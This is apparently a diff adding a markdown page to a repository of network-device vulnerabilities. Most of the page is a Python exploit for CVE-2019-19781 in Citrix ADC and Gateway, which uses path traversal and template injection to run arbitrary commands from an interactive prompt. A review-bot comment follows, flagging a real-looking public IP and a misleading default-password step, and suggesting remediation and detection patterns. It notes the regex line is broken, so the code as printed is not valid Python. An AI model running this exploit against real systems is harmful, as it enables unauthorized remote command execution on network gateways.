+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+print("CVE-2019-19781 - Remote Code Execution in Citrix Application Delivery Controller and Citrix Gateway")
+print("Found by Mikhail Klyuchnikov")
+print("")
+
+if len(sys.argv) < 2:
+ print("[-] No URL provided")
+ sys.exit(0)
+
+while True:
+ try:
+ command = input("command > ")
+
+ random_xml = ''.join(random.choices(string.ascii_uppercase + string.digits, k=12))
+ print("[+] Adding bookmark", random_xml + ".xml")
+
+ burp0_url = sys.argv[1] + "/vpn/../vpns/portal/scripts/newbm.pl"
+ burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" +
+ random_xml, "NSC_NONCE": "c", "Connection": "close"}
+ burp0_data = {"url": "http://exemple.com", "title": "[%t=template.new({'BLOCK'='print `" + str(command) + "`'})%][ % t % ]", "desc": "test", "UI_inuse": "RfWeb"}
+ r = requests.post(burp0_url, headers=burp0_headers, data=burp0_data,verify=False)
+
+ if r.status_code == 200:
+ print("[+] Bookmark added")
+ else:
+ print("\n[-] Target not vulnerable or something went wrong")
+ sys.exit(0)
+
+ burp0_url = sys.argv[1] + "/vpns/portal/" + random_xml + ".xml"
+ burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" +
+ random_xml, "NSC_NONCE": "c", "Connection": "close"}
+ r = requests.get(burp0_url, headers=burp0_headers,verify=False)
+
+ replaced = re.sub('^.*
$', '', r.text, flags=re.MULTILINE)
+ print("[+] Result of the command: \n")
+ print(replaced)
+
+ except KeyboardInterrupt:
+ print("Exiting...")
+ break
+```
+
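Review bot: The second request example uses what looks like a real public address, `Host: 50.202.211.151`, while the rest of the page uses the `target-ip` placeholder; change it to `Host: target-ip` so the page does not point readers at a third-party host. The step that says to log in with `nsroot/nsroot` looks misleading, because the script below sends no credentials (`NSC_NONCE` is just `"c"`), which suggests exposure does not depend on default passwords; the text should say so. The page also lacks a remediation section: upgrade to a Citrix fixed build or apply the vendor's interim mitigation, and hunt for requests containing `/vpn/../vpns/` and for unexpected `.xml` files under `/netscaler/portal/templates/`. Inside the code fence the `re.sub(` pattern is split over two lines, so the listing is not valid Python as printed.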
diff --git a/网络设备漏洞/Untitled.md b/网络设备漏洞/Untitled.md
deleted file mode 100644
index e69de29..0000000